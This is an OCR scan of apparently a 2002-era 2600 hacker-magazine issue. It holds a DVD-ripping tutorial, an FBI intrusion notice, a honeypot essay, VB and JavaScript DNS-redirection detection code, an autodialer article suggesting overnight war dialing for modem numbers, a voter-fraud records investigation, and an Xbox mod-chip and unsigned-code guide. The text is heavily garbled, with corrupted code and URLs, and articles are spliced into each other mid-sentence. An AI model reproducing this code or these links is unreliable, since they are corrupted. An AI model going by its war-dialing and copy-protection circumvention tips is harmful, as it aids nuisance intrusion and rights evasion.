TMpgEne. 

7: (From now cm, all unlettered steps reh i 
VCD and SVCD only, since AVI users should 
have stopped reading this already.) Now v 
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have a *.d2v and a *.wav file. We need to merge 
these into a single MPG hie. Fire up TMpgEne, 
Once again, take a look at what it can do be lore 
trying to rip - this program in particular is very 
useful, I highly recommend playing with the 
"MPEG Tools" under the file menu. Now that 
you are ready to go, check out the bottom of the 
main TMpgEne screen. You have three boxes 
there: “Video Source", "Audio Source”, and 
"Output File Name". For video source, we want 
Ihe *.d2v file w r c just created, and for audio we 
want the *,wav file, (Side note: listen to the 
wave before finishing this step. If it s not the au- 
dio track you want, go back to the DVD2AVI 
Mep and select a different audio stream from the 
audio menu until you get the one you want) For 
the Output file name, select where you want the 
MPG file to be saved. Now we need to set up 
the encoder Click the "Load" button next to the 
output file name box, and navigate to the "TMp- 
gEnc\Template" folder. From here we have the 
choice of loading a number of templates, but 
we re interested in only four: VideoCD (NTSC), 
VideoCD (NTSCFilm), SuperVideoCD 
( NTSC), and SuperVideoCD (NTSCFilm), 

8(V): VCD users check where you wrote 
down the "Video Type" from the end of step 6. 
If it was higher than 90 percent Film, load the 
"VideoCD (NTSCFilm)" template. If the video 
type was anything else, just load " Video- 
ed P( NTSC)", Now' click setting. Leave every- 
thing alone except for this setting: Under 
advanced, change the "Source Aspect Ratio" to 
what you wrote down front "Aspect Ratio 1 ' at 
the end of step 6. Now click OK to go back to 
the main window. You're ready to convert to 
MPG, Click "Start" in the top left corner and 
then get some sleep. It takes up to three hours 
on a 2ghz Athlon machine, probably much 
much longer for most of you. 

8(S): Video CD users, use the instructions 
from step 8(V) - just load the SuperVideoCD 
templates. 

9: Boy, that took a while. Now we have an 
mpg file of the complete movie. Check it for 
quality, audio synch, and general not-being- 
serewed-up. When you're satisfied shat the tile 
is complete, it is safe to delete all the other files 
that you used for this project. Now the tile 
should be roughly a gig for a no rmal length 
movie. We need to split il up. Stay in TMpgEne. 
Remember when I mentioned the cool MPEG 
f ools? We're going to use one of them now. Go 
to file-IMpcgTools. Click Lhe "Simple De-Mul- 
tiplex’ 1 tab. Load the mpg file of the movie into 


the "Input” file box, and the other two should be 
automatically filled in for you. Click the start 
button. It will rip the MPG file into a *.m 1 v and 
a *.mp2 lile. These we need to load into BBM- 
peg. Go lo the BBMpeg folder and run 
"AVI2MPG2". It looks very confusing when it 
loads, but don't fret. Take a look around again. 
What we need to do is simply click the "Start 
Encoding" button, ignoring the very confusing 
initial interface. Click the Settings button. We 
need to set something on three out of the four 
tabs you now have access to. On the "General 
Settings" tab, set the "Max Size(MB)" to a num- 
ber equal to roughly half Lhe filesize of the file 
you have, but don't go higher Lhan I OMR less 
than the size of your CD you will burn it to. 1 
like to keep mine set to 640MB, it seems like a 
pretty standard size. On the "Input and Output 
Files" tab, we need to set three things. The "Pro- 
gram Stream File" is the name of the output file 
you want. Your half-movies will be called f file- 
name fOI. mpg and { filename |02 mpg. Now (br 
the "Video Stream File" and "Audio Stream 
File", use the *.mlv and *.mp2 files we just cre- 
ated, respectively. The last tab is the "Program 
Stream Settings". Simply choose "VCD' or 
"SVCD" from lhe radio buttons. The fourth tab 
allows you to save your settings for this pro- 
gram, Do so if you are going to be using it a lot. 
Click OK to get back to the "Start Encoding" 
screen, then click Start", This shouldn’t lake 
very long, 

10: Now we have two (or sometimes three) 
files that are small enough to fit on CDs. Load 
up Nero, In the "Create CD" dialog, ruCTO should 
have options for both VCD and SVCD. Select 
whichever applies. Under the ISO tab, select 
'ISO Level 2" for the filename length, and "ISO 
9660" as the character set. Also check all the 
boxes under "Relax ISO Restrictions". Now we 
are ready to burn. Click "New" and it will take 
you to a normal CD creation screen, except the 
CD window has both a directory structure and a 
file list box in it. Drag your file to the white box 
under the directory tree, not into the tree itself 
even if you know where it goes. Nero will check 
the file. It it complains, just ignore it. Et should 
still work. Now bum... and you will have your- 
self a fresh VCD or SVCD. Repeat this step for 
the rest of the disks needed to get the full movie, 

1l(V): Playing VCDs on computers: You 
can use a software VCD player, or just go into 
the CD and open "AVESQ0I.dat" in the "MFE- 
GAV" folder with your favorite media player. 
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11(S): Playing SVDS needs a compatible 
DVD software player or an MPHG2 codec for 
your Medial Player. Personally, I use ATI’s me- 
dia center, or Power DVD. 

1 2: Enjoy! Props to KalLI - I learned how to 
rip DVDs using his site. Also, check out after- 
dawn .com - there are some good things on 
there. I would also like to ask Wilson to read 
this article aloud to the class like he always 
does. Thanks. 




Links 

till tp jf w w w, all e rdaw n .c om/so ft w a re/vi dco_sot i 
ware/d vd_r i ppers/sma rt ri ppe r.e fin 
h up ://w w w a herd aw n . co m/so ft w are/v i dco_so ft 
wa re/d vd_ri ppers/d vd 2a vi, dm 
h itp ://www + afterdaw n .com/st > ft wore/v i deo_s< > ft 
ware/v ideo_ too I s/tmpgenc. c f m 
h up ://me tube rs, cox . net/beye le r/hbmpeg. him 1 
http://www,adaptec, com/world wi de/support/dr 1 ■ 
ve rdet ai L him I ?Cflt=/Pr< kIucI/ A S PI - 
4,70&fi lekey=saspi _v470.exe 



UJS, Department of Justice 


Federal Bureau of Investigation 


In Reply. PfcUic Refer tu 
File Nu 


he NASA Office of Inspector General and the FBI are conducting a joint investigation 
into unauthorized computer intrusions that have affected both the government and private 
industry. During the course of this investigation, we discovered a log file listing Internet 
Protocol addresses and server names, it appears to be a list of computers that were 
compromised. 


In order to notify the potential victims of ibis criminal activity and enable them to check 
their own systems, we have compared the log of IP addresses and server names against the most 
recent information available in the WHOIS database. This letter is being sent to you because the 
IP address or sewer shown below, and last registered to you, appeared on the log file of apparent 
victims. 


We have no indication that the intrusions associated with this activity are continuing. We 
also are unaware of the hacker's methodology against your system, the potential level of access, 
or the possible damage to your system. The time frame of the activity to which the log file 
relates occurred between December 2001 and March 2002, with the majority of the activity 
occurring in mid -February 2002, 


This communication is being provided to you by the Watch and Warning Unit of the 
National Infrastructure Protection Center (NIPC), located at FBI Headquarters in Washington, 
D.C. In addition to the recommendation that you check your log files for indications of unlawful 
activity and lake appropriate mitigation action, NASA and the FBI request that you provide any 
information relating to this matter to the NIPC by e-maiting the W T atch at ni pc, ware fra 1 : fhi.gov. 
For recommendations about examining your systems in a manner dial helps preserve die 
evidentiary value of information you discover, please refer to the NIPC website at 
www . n ipc . go v/incid ent/ i nc i d ent2 . h t m . 


System (s) Information 




i he kicker of this is that both the contact and domains referenced had nothing to do 
with us and we were apparently sem this letter in error. Yet more wasted time and 
re st >u ree s . he Wa t e h a nd Warn i n g Unit ? ! ) 
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they would not under normal circumstances en- 
gage in. It's going to be next to impossible for 
poor xy63r ninja to use an entrapment defense 
in court, because by the time po po shows up. it 
will be obvious he was lame-assing around of 
his ow n accord. However, if a crafty admin goes 
on IRC and tells everyone that his honeypot is 
actually the fabled government computer that 
holds the truth about the Kennedy assassination, 
Area 5 1 , and ancient methods of dolphin flog- 
ging and people hack him. then an entrapment 
defense would stand a chance. The reason is 
that the admin could never prove that xy63r 
ninja and his crew were going to hack his sys- 
tem without being enticed. Other critics say that 
honey pots are akin to electronic wiretapping. 
This 1 can agree with. Since there is not much 
legal regulation of honeypot technology, and 
the closest legal procedures are loose at best, 
some very scary things could happen. 

Other companies could expand the basic 
thrust of the technology, perhaps into the p2p 
networks. At lhat point it would be us, the 
hacker community, that stands up and tells the 
world thaL Lhis is a gross invasion of privacy. 
Then, pretty much just like the MPAA did to ns, 
all they would conceivably have to say is: ' Con- 
sider the source, your honor. Hackers want this 
technology stopped. Hackers are criminals. Yon 
don't want to side w r ith criminals, do you? We 
are here to protect the American people from 
hackers, and wc need you to he brave and give 
us the power lo shut these nasty people down." 
Then in all likelihood, the corporations would 
roll right over us again. I don't think it takes a 
major leap of logic to see that this is where hon- 
ey pot technology, or more specifically, technol- 
ogy that clearly violates people's rights under 
the guise of protection, could be headed. Also, I 
don’t trust the "good guys" any farther than I 
can throw them. We need to put a handle on the 
situation before the "security community" gets 
any ideas on how to further expand their powers 
past our rights on the backs of the hacker 
community they demon i/.e lo get their way. 
Why Hon e y pots A re 
Not Practical For Everyone 
The good news is that honey pots arc not a 
true "solution,” The best application for a hon- 
cypoi is to track an intruder who has already 
made a home in ihe system. The most notewor- 


by Bland Inquisitor 
bland _iuquisitor@hotiDuil.c0tn 

Honey pots are usually programs lhal emu- 
late services on a designated port, but once suc- 
cessfully cracked, offer no real power to the 
altacker. The honeypot program will then alert 
ihe admin that an attack is in progress, and will 
allow the admin lo Lrack the attacker’s every 
move. Honey pots will also show the methods 
the attacker is using to gain entry, and what 
methods are being used to cover his or her 
tracks. In this article, 1 will show how honey- 
pots work, why honeypots are not generally 
practical for most security situations, and how 
honey pots are breeding both smarter attackers 
and dumber admins. 

How Honey pots Work 

Honeypots are designed to operate on many 
levels. They increase the time an attacker will 
spend because the honeypot makes it unclear 
which attacks work and which ones don't. They 
let the admin know what method an attacker is 
using before they succeed - such as port scan- 
ning, bruie forcing a password, or a Send mail 
attack. Once honeypots are widely imple- 
mented, the attacker will be forced to spend 
more time in a system that may be closely 
watched, and will eventually be scared off. 
Also, once xy63r ninja the script kiddie stops 
going anywhere near the system, admins can fo- 
cus all their attention on fending off people w ith 
actual skill. 

In one of the honeypot advertisements I 
read, port 365 was being used as the honeypot 
porL, This means that a scan that returns port 
365 as active will make the would-be attacker 
turn and run off and sltal systems lhal are not 
running the honeypot can use port 365 as a 
blulT. so that when xy36r ninja the script kiddie 
sees it and the system looks sexy, he will be less 
inclined to go in because he thinks that the vul- 
nerabilities he sees are a deception. According 
to SecTech systems administrator Dan Adams, 
honeypots are "like opening a fake store, load- 
ing i( with cool stuff, and sitting back hoping 
someone will break into ii." 

Honeypots are catching a lot of pretty seri- 
ous heal from ihe legal and ethical community. 
Some critics are calling honey pots entrapment. 
Let me clear this up for you. Entrapment occurs 
w hen a person is coerced to commit a crime that 
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thy case of this happening was documented by 
Clifford Stoll in his book The Cuckoo's Egg. 
Stoll was an admin at Berkeley when he found 
an intruder using his system to steal secrets. But 
only an admin who has been around the block a 
few times and watches his system often can 
make full use of honey pots. Apart from that, 
over 90 percent of attacks against a system 
come from inside, and there is nothing a honey- 
pot can do to stop someone who has internal ac- 
cess from running amok For the average 
company, the extent of a honeypofs effective- 
ness is to keep xy63r ninja and the rest of die 
script kiddies away, and to show that (here is a 
real threat of people breaking into the system. It 
is almost unheard of that a honey pot traps 
someone with real skill because it is designed to 
keep the kiddies at bay. 

In the digital arms race, tightening the exist- 
ing Security holes will only force the attackers 
to get better while the admins get complacent. 


Most admins are only slightly better than good 
ole xy63r ninja in the first place - they get the 
latest and greatest piece of ready-made software 
and call themselves experts. What is bound i" 
happen in the majority of the situations is that a 
company sets up a houevpol and never bothers 
to spend the time it takes to maximize its effec 
live ness. Of course, the true answer is lor ad 
mins and software programmers to actually take 
a little pride in their work and do their jobs 
properly. Also, h would help if software compa- 
nies would take some responsibility when they 
find security holes in their product and update 
accordingly. System admins should also feci 
obligated to keep their software current, and 
make sure nobody within their company is 
given more access than they need. 

Shout outs: stankdawg , grifter, dehug. pro- 
jeci honey net. And an apology if anybody actu- 
ally uses the name xy63r ninja. 


Redirection stopped 


by cMd_bOM 

The letter from "bradsnef in 1 9; 3 uboul how Ford could redirect back to 2600.com or 127.0.0. \ 
etc. got me thinking about how easy that could be. It turned out to be easier than ! thought. Every 
http request has a host field in it that contains the address that was typed in. so if I type in 
www.2600.conT and click "Go'* it will have www.2600.com in the host held. 

All browsers that l know of send the host field in their http request. If DNS redirects a site, the 
host field will not change when redirected and so we can detect it with little effort. 


Example of a HI TP request (notice the host field): 


GET/ HTTP/1.1 
Accept: +/* 

Accept -Language: emus 
Accept-Encoding: gzip. deflate 

User- Agent: Mozilla/4.0 ( compatible; MS IE 5.0; Windows 98: DigExt) 
Host: www.2600.com 
Connection: Keep-Alive 
<crlfxcrlf> 


Included is a small VB program (I used VB to show how easy it is) that scans all incoming hup 
requests and checks to see if the host field is the web address or the IP address of the current web- 
site. If not, it redirects to 2600.com, and if so it redirects to Ford's website. This doesn't protect from 
meta tag redirection, or (I)FRAME redirection which needs a webpage to do the redirecting, ratlin 
than a DNS entry. Here is a script that can stop that (real simple - it look live minutes’). Hey, a 16 
year old can do it, so can a big corp. 

<html> 

<head> 

<script> 

spl i t i t=documen t . re ferrer. s pi i t ( 1 7 1 r ) 
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if (splilitf2|= ,r www.fuck generalmotors.com") [ 
document. writeO^htm I xheadxmeta hltp-equi v=' REFRES1 1 
content-' 1 ;URL=http://www.2600xom'></head></hinil> 1 ' ); 

1 

else { 

cl oc u men t , wri te ( <hi ml xhcu d>< meta http- eq u i v =' R E FR ES H r 
co n le n L= f I ; U R L= h ttp ://www, ford, com 'x/he adx/h tm 1 > " ) ; 

1 

</script> 

</head> 

</html> 

OK, here is the DNS Redirection filter made in VB. 

Note: If you are going to set this filter up you'll have to change your server port to something 
other than HO and change the meta headers to redirect to that port (big deal, unless you're running 
IIS). You could add this feature to an open source web server, too. You could alter the code to 
redirect to the port directly. 

Step 1. Create a project wiLh "Standard EXE M . 

Step 2. Add a Win sock component and name it Win sock 1 (dial's the default). 

Step 3. Change the properties of W insock 1 s Index tab to 0. 

Step 4. Make a form and name it Form I (default again). 

Step 5. Put the code below in the form. 

‘DNS Redirection filter 

'by cO!d_b(X)i 

'for Fored(Iol) and NPR 

Private we bad dress As String 
Private web ip As String 
Private intlastcontrol As I .one 

Private Sub Form_Load() 

we bad dress = LCa$e(Winsoek 1(0). Local HosiName) 
webip = Win sock 1(0). Local IP 
intlastcontrol = 0 
With Winsockl(O) 

.LocalPort = 80 
.Listen 
End With 
End Sub 

Private Sub Winsock I _Connect ion Request ( Index As Integer, ByVal request id As Long) 

If Index = OThen 

intlastcontrol = intlastcontrol + l 
Load W i n sou k l ( i m 1 as Icon t ro l ) 

Winsock I (intlastcontrol). LocalPort = 0 
W i n soc k 1 ( inti as tcont rol ) .A ccep t req ue st id 
End If 
End Sub 

Private Sub Winsock l_DataArrival( Index As Integer, ByVal bytesTotal As Long) 

Dim data I As String 

Winsock 1 (intlastcontrol ). Get Data datal 

On Error GoTo redirect normal 

al — InStril, datal, ‘Host: ") + 6 

a2 - InS tr(aL data I . vbC rLf) 

a3 = LCase(Mid( datal, al, a2 - al)) 

If a3 = webaddress Or a3 - webip Then 
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GoTo redirectnonnal 
Else 

' D N S red ireclion de tecte d red i rec ting bac k t o 2600. com 

Wmsockl(mUastcontrol).SendData "<htmlxheadxmeta http-equiv=" +Chr(34)+ "REFRESH" 
+ Chr(34) + " conttnt= r + Chr(34) + "l;URL=4ittp://www, 2600 . com" + Chr(34) + 
"x/hcadx/html>" 'meta tags here 
End If 
Exit Sub 

here we do a normal redirection to ford.com 
redirect normal: 

Winsock l (intlastcontrol ).SendData ,r <html><headxmeta http-equiv=" + Chr(34) + "REFRESH" 
+Chr(34) + " conte nt=" + Chr(34) + G ; U R L=hUp ;// www. ford, com :8(F + Chrl34) + 
"x/head></html>" meta tags here 
End Sub 

Private Sub Win sock I _SendCfomplete (Index As Integer} 

Winsock I (intlastcontrol). Close 
End Sub 

Step 6: Compile and run. 

Shoutouts: Hi Mom, Bryan, Cassidy t my bro (Nathaniel), and whoever I forgot. 


More on 


Tel ©market i rig 


by D» Foetus 

In response to the number of letters re- 
ceived regarding the TcleZapper and similar 
systems that will Vap" vour phone number 
from a telemarketing system's database* here is 
some more insight. 

Many larger telemarketing, market re 
search, and bill collection companies use auto- 
dialers coupled with CAT I (Computer Aided 
Telephone Interviewing) software systems. 

It is the job of the autodialer to dial, say. ten 
phone numbers for every human agent that is 
currently seated in their calling center, know- 
ing that one out of every ten phone calls will be 
answered. The number of calls made by the 
auto-dialer can be, and usually is, automati- 
cally adjusted depending on how that 10:1 ra- 
tio performs. For example, if the sample being 
dialed consists of phone numbers culled from 
product registration cards, the number of an- 
swered calls may be higher than if the machine 
is running RDD {Random Digit Dialing) in 


valid area codes and exchanges, minus already 
known phone numbers - basically war dialing 
lor unlisted phone numbers. 

If you ever get a phone call that shows up 
on your Caller ID as being from, say, X YZ Re- 
search, and it hangs up immediately after you 
answer, you've received a 'nuisance call." This 
happens when the autodialer has made more 
calls than there arc available humans to patch 
you to. Your phone number is now tiagged and 
will receive special treatment - the system 
knows you arc home and answering the phone, 
but it also knows it just hung up on you. You 
will now get another call from XYZ Research 
in about 15 minutes (the amount of time lapsed 
is set by the user system-wide], but this time 
their system will reserve a human before call 
ing you, ensuring that they get to talk to you. 

The autodialing system will eventual Is 
have dialed through the entire pool of sampf 
and it will have pretty much determined whit h 
phone numbers are good and which are not. lr 
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can distinguish between non- working numbers 
(those that answer with the familiar tri-tone 
followed by a recording of some sort), those 
that do not ring at all those that are busy, those 
that arc good (no answer, etc.), and those that 
are fax/modem/machine numbers. Each phone 
number has a status code assigned to it and any 
bad numbers are resolved never to be called 
again. 

Aside: Interesting point here is that all the 
fax/mode nV machine numbers will have re- 
ceived a unique status code marking them as 
such - basically there now exists a pool of 
phone numbers that have a very high likeli- 
hood of being modem numbers. Just as easy 
would he to set up a project that runs automat- 
ically overnight, dialing strictly 202-xxx-xxxx 
numbers (if you wanted to find machine num- 
bers in the DC area), and have your CATI soft- 
ware just hang up on all good numbers. Look 
at your "bad: modem number" list in the morn- 
ing and you've got an excellent start on your 
fun for the days to come. If one has the desire, 
and access lo a larger system, one could easily 
burn through tens of thousands of phone 
numbers in a single night. 

But back to the TeleZapper vs. auto- dialers 
and other devices. For them to work, your 
phone must actually go off hook and transmit 
the tone(s). If an auto dialer calls your number 
and your voice mail picks up, the call is imme- 
diately transferred to an available agent, who 
will mark your phone number as known good, 
but you're not home (answering machine/ voice 
mail answered). I'm sure you're already ahead 
of me here, but, the obvious step to take is to 
record the "bad number" tone(s) as the first 
part of your outgoing message. Sure, it will an- 
noy the hell out of your friends and family, but 
it will kill your phone number in that sample 
pool if it's being dialed by an intuitive 
auto-dialer. 

Note that I say that sample pool. Your 
phone number may exist in myriad sample 
pools at different companies. One way to dra- 
matically cut down on telemarketing calls (and 
market research calls, if you're so inclined, 
though they arc two very different entities with 
two very different agendas), is to first register 
the phone number with the DMA (Direct Mar- 
keting Association) as warning to opt-out of 
telemarketing calls. Also, explain to any com- 
pany you do not wish to hear from that you 
wish for your phone number to be placed on 
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their "do not call" list. The DMA also allows 
one to register their mailing address as well as 
email address as opt-outs to cut down on junk 
mail and, allegedly, spam email. Not all com- 
panies check their sample against the DMAs 
opt-out list, and not all maintain a M do not call" 
list, but any company that wishes to do busi- 
ness in an above -the- board manner will heed 
your request. Telemarketing companies can he 
somewhat sketchier than market research com- 
panies - any market research company that 
wants to stay in business and make money will 
follow the guidelines for standards and ethics 
set forth by the MRA (Marketing Research As- 
sociation), CASRO (Council of American Sur- 
vey Research Organizations), and other 
organizations. A client will likely not do busi- 
ness with a market research company that does 
not belong to these organizations. 

It does take a while for your opted-out 
phone number/address/email address to trickle 
down and through the giganric system that is 
comprised of sample houses (those that pro- 
vide the phone numbers, street addresses, and 
e-mail addresses), and to the thousands of end- 
users ( telemarketers and research companies), 
but it does work, A perfect time to do this is 
when moving and getting a new phone num- 
ber, but ii will have an eventual effect if you're 
staying pul as well. 

Another option is to sign up for your local 
telco's "security screening" plan, if available. 
This will require any caller who is blocking 
their Caller ID info to input their phone num- 
ber, or the call will not be connected. One 
drawback is that some long distance compa- 
nies relay calls around the country to the clos- 
est low -traffic switching point and the Culler 
ID info is stripped in the process, requiring 
Grandma to input her phone number each time 
she tries to call you, since she's on a lixed in- 
come and using Jimbo's Phone Company lo 
make cheap long distance calls. 

No one will ever be totally free from re- 
ceiving unwanted phone calls, but there arc 
ways to dramatically reduce them. As many 
ways that there are of keeping our phone num- 
bers in the hands of Lhose we want calling us, 
there are ways of getting around whatever we 
put in place to try to ensure this. Surely some- 
what ironic to those reading this magazine,... 
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Cracking VOTER Fraud 


by Kr@kH3d (DFxC) 

f Why the goofy "teei" name / Overkill is funny...) 

Some New York 2600 readers may have seen 
ihe recent three minute report on WABC's Eyewit- 
ness News (10/25/02) on the discovery of sus- 
pected fraudulent voters in New Brunswick, NJ. 
Since I ve been a longtime 2600 fan and played a 
major part in the investigation, I figured I'd outline 
how we did it. After speaking with the people at 
the local Board of Elections and realizing how 
easy it is to commit voter fraud, I also fell it may 
be of use to others in general Oh, and if you saw 
the report, there's a brief shot of my back while I'm 
at the computer wearing an H2K shirt! 

The technique outlined here was developed by 
Lhe New Brunswick United (http://www.new- 
bmnswiekunited.com) Antifraud Division, headed 
by attorney Flavio L, Komuves. I was lead investi- 
gator in charge of isolating possible cases of voter 
fraud, and was ably assisted hy a number of Rut- 
gers University student interns, 

1 should preface this with the disclaimer that 
the resources and procedures i am outlining are 
legally available in New Jersey, and there is no 
need to obtain any information illegally. Check 
with your local authorities for your area. Also, a 
new law regarding voting was recently signed and 
certain new provisions will take effect in the 2006 
elections. Always lake any information you gather 
to a reputable lawyer and gel advice before releas- 
ing it publicly - voter fraud is a serious charge and 
falsely accusing someone (even unintentionally) 
could probably result in charges against you! Also 
keep in mind, any information we determined via 
this method of database searching was later veri- 
fied by actual held visits to the properties in ques- 
tion. 

It's actually rather similar to profiting a system. 
The first step is to gather all the information possi- 
ble about your target. Your first stop should be 
your county Board of Elections. You will have to 
fill out certain forms - being part of a political or- 
ganization helps out here, as they reserve the right 
to ask why you are requesting the information. 
There are two databases they maintain thai you 
will need to request on CD-ROM: the current Ac- 
tive Voter Registration database ("walking list") 
and the current Actual Voter Database ( "voting his- 
tory"). There will probahly be a fee involved - ex- 
cessive fees for preparation and other "costs" is yet 
another way the government restricts your access 
to information (while insisting on greater access to 
your information). I believe it should come to ap- 
proximately $60 for both CD-ROMs and li may 
take a week or so for them to prepare. 


The second stop is your local Municipal 
Clerk's office. Here you request a listing of all paid 
city employees [ Municipal Employee List" ). 
specifying the following information: salar 
whether or not he or she is a city resident, years o I 
service, job title, and of course name. They must 
release this information to any city resident as ii is 
considered public information (your tax money 
pays Eheir salary). Again, they may charge you tor 
costs. In our instance, Ihe City Clerk's office tried 
! browing us off by refusing to provide us with a 
CD-ROM version, and instead provided us with a 
printout of the database. Luckily, volunteers cre- 
ated an Access database and entered the informa 
tion into it within a day or so. You may also request 
a listing of all rental properties [and landlord own 
ers) from your city's Rent -Leveling Board or 
simitar body. 

OK t so now you have your base documents. 
You've gathered your information. Now to poke 
for weaknesses. What next? Well, first look at IT 
Active Voter Registration and sort it by birthday 
Any 172 year olds still registered? Probably not. il 
so, cheek their names on the Actual Voter Dai a 
base. In our investigation, we immediately noticed 
an enormous number of people horn on 
01/01/1901. According to the Board of Elections 
this is their standard procedure for dealing with il 
legible entries and/or people who registered to 
vote before New Jersey required b nth date to he 
added to the Voter Registration form. Sorry, strike 
two. Next, run a query to isolate everyone from 
like age 99 and up. If you feel there's an overabun- 
dance. check the names against the Social Security 
Death Index on http://www.ancestry.com. Don'i 
gel too excited if you find matches though - Amcr 
icans have the funny habit of naming their kids af 
ter themselves. Go to hdp://nhvw.netronliue 
.com/pub I ic_records.htm ( Property 1 a x Reeor \ Is 
and make sure it isn't their son or grandson tin one 
instance we originally thought for sure was voter 
fraud, there was a son named alter his father, w ho 
inherited the house his parents had lived in, and 
then married a woman with the same first name as 
his mother - creepy!). Be thorough, but don't waste 
too much time on this - we had a team spend over 
a month on this and turn up only a handful of "pi > 

si hies. It might also be helpful to have some 

working with you who has access to credit card 
hi siories/databaxes , but I'm not sure if that is legal 
or how useful it would be in this instance. 

That takes care of the infamous 'dead vote 
The next "weakness” to probe is the Mumapnl 
Employee List, Hopefully, you know yom u ■ ■ i 
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pretty well, because how effective your work here 
will be will he in direct proportion to how well you 
know your town. The first test is to query all non- 
city resident employees and run their names on 
both the Active Voter Registration and Actual 
Voter databases. Note down any instances, but 
keep in mind that ihe individual may have lived in 
your town ni otic time, and showing up on the Ac- 
tive Registration Database isn't a crime in and of 
itself - voting I i.e., being on the Actual Voter Data- 
base) is. Follow this up by running a query with all 
employees making over, say, $65,000 a year. Run 
their names on both the voter databases and pay al- 
lent ion to what their registration address is. You 
may discover some rather well-off individuals liv- 
ing in really shady neighborhoods. In our investi- 
gation, we caught the city's Chief of Operations for 
Urban Renewal voting out of the same run-down 
apartment in an impoverished high-crime area as a 
small immigrant family. On investigation of the 
Property Tax Records, we discovered he lived in a 
nice home a few towns away! Most of our results 
came from dfis method. 


Requirements: 

A mod-chip. 

Ed's xbox linux (Debian derail ve) found at: 

1 1 1 1 p ://sourc e forge . n e t/proj ect/sho wfiles, p h p ?gr 
uupjd=54l92, 

BIOS for mod-chip that allows Xbox to run 
unsigned code. 

E volu ti on X d ashb< »ard , 

As some might have noticed, there has been 
several strides made in Lhe attempt to pul Linux 
on any device in which it would he logically 
beneficial to the computer/hacker community. 
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If you managed to gel a copy of the landlord 
tislings, be sure to check all those names thor- 
oughly as well. A common form of voter fraud is 
for landlords to register at a property they are rent- 
ing out. A good portion of our leads were also gen- 
erated this way by checking landlords we knew 
had broken the rent-control laws. 

The last method we used lhai had results was 10 
start running names of business owners who oper- 
ated in town. Much like the landlords, some un- 
scrupulous business owners will register to vote at 
their place of business. 

Wet! , that's basically it in a nutshell. Hopefully, 
this short article was informative and useful, as 
well as a contribution showing that 2600 readers 
are often more concerned about protecting and 
maintaining the democratic process than the politi- 
cians who scapegoat us as evil hackers. For ques- 
tions or comments, email domi nick® rami ustech 
.com with "2600 1 ' in the subject line. 


or just for the challenge of iu The Xbox is no 
exception. Jt is now possible to pul a full Linux 
distribution on the Xbox console, due to the 
work of some very diligent Linux/Xbox hack- 
ers. I will cover the steps to go about installing 
Linux on your Xbox console and Lhe 
significance of such an installation. 

There are multiple reasons one might want 
to go about installing Linux on an Xbox. For 
one, it would serve as a very inexpensive desk- 
top computer. Being Lhai you can now find 
Xboxes selling at prices of $ 1 7G-S20Q, this is 
understandably worthwhile. The Xbox is also 
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feature-rich, it is a gaming console, DVD 
player, and now with the inclusion of Linux, can 
be your desktop computer, DivX player, and 
web/ftp server. Perhaps you would use it just to 
run nominal functions, saving your main com- 
puter the stress. This is just the beginning, 
though. The possibilities are, obviously, 
limitless. 

This brings us to the actual installation. You 
will need a modified Xbox to consider such a 
setup. However* this is not as scary as it may 
sound to Lhose who might not have soldering 
experience. Gone are the days in which you 
would have lo solder 29 wires to the Xbox 
motherboard. You can now buy wireless mod- 
chips which require no soldering at all. There is 
a chip out now called the Matrix (by Xodus) 
that is wire free and can he installed in a matter 
of minutes. There are also other chips in devel- 
opment that will be wireless also, so then it 
would be just a matter of personal preference as 
to which you would choose. T have chosen to go 
with the Matrix chip because it has no wires to 
solder, comes with a programmer, and, as far as 
l have seen, is Lhe easiest to install, I must men- 
tion also, if you don 1 ! want Lo fork out $60, you 
can make your own. CheapLPC designed by 
Andy Green, can be constructed for a few 
bucks. Visit http://warmcat.com/iiiilksop/in- 
dex.html. 

So this is where we start. You have your 
mod-chip of choice. You also downloaded the 
-iso image of the Xbox Linux distribution lo- 
cated at the sourceforge site mentioned at the 
beginning of the article. You will need to flash 
your mod chip with a BIOS lhal will support 
running unsigned code on the Xbox. These 
BIOSes can be readily found on the Internet 
with a little due diligence. I mentioned that the 
Matrix mod-chip comes with a programmer. 
You can plug that programmer into the parallel 
port on your computer and dash the Matrix with 
BIOS software that way. You can get the flash- 
ing software from http://warmcat.com/milk- 
sop/ index.htm I (Xodus will release their own 
GNU software shortly). I have chosen to go 
with the EvolutionX 2,5 BIOS because it sup- 
ports all the features one would want, such as 
running unsigned code, among others* Next* 
you will have to download the EvolutionX 
dashboard, which will replace the original Xbox 
dashboard, and will act as your new interface 
with ihe Xbox and burn it to a CD-RW (X boxes 
do not like CD-Rs). i his can also be found on 
lhe net with a little patience* 



4. Hack a way to circumvent the spyware or 
adware software and most importantly post these 


You will then need to open your Xbox and 
physically install rhe mod-chip. After that, you 
will want to install the EvolutionX dasbboan 
ill at you downloaded and burned to CD. You 
will now have a pretty new interface that hm 
many features, such as backing up games (that 
you bought) and whatnot. Once this is insta \ 
you will then he able to install your downloaded 
Linux distro. 

You might he thinking, how do 1 work win 
Linux when all 1 have is an Xbox controller? 
Well* as you might know, the controller ports on 
the Xbox console are really just usb ports* with 
a little modification. You can get ahold of an 
Xbox controller extension, cut it in half leaving 
the end that plugs into the Xbox intact, and look 
at the wires. You will see a red, green* blue, 
white, and yellow wire* the same as a standard 
usb cable minus the yellow one* You can then 
cut a usb cable, leaving the usb A end intact 
which connects to your usb keyboard/mouse. 
Solder the matching wires together and leave 
the yellow Xbox wire by itself. Do this two 
limes and you now have a keyboard and mouse 
that you can plug into the Xbox and use with 
Linux, assuming I mux supports the ones you 
chose (make sure it does). 

There you have it A Li mix /Xbox that can 
now be used as you wish it to be* and the best 
part about ti is that it is legal. The developers 
that have been working hard on this Linux pro- 
ject are not building this software on top of the 
Microsoft kernel - they are using the Linux ker- 
nel. They are also not using non -licensed soft 
ware like the XDK, which is Microsoft's 
development kit lor the Xbox. The reverse engi 
nee ring that has been done has been done under 
Sec t ion 1201 ( I ) Rev erse Eng i nee ri n g Ex ce p- 
tion for interoperability of the DMCA. 

1 am indebted to the Linux developers of 
xbox- fi nux, so urce forge . net* the Xodus team 
Xboxhacker.net {and its forum), Andy Green, 
and several other sites/i ndi v i duals/hac k ers that 
have made this article possible. 1 will cover the 
more technical aspects of Xbox hacking in a l u 
lure article, but 1 hope 1 have given enough in 
formation so dial you might get a start with 
hacking Linux onto the Xbox, and team in rli« 
process. 
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by 0A/3_ 3>3d_MU/VsLV 

ha x or 260(1 @ ma ikity.com 

This short article is far too small to encompass 
this topic but hopefully it will focus more atten- 
tion on the increasing problems of removing spy- 
ware and adware. Any hacker running a Window s 
operating system is going to come across some 
spyware or adware at some point. Popular lile 
sharing P2P software are typically one of the 
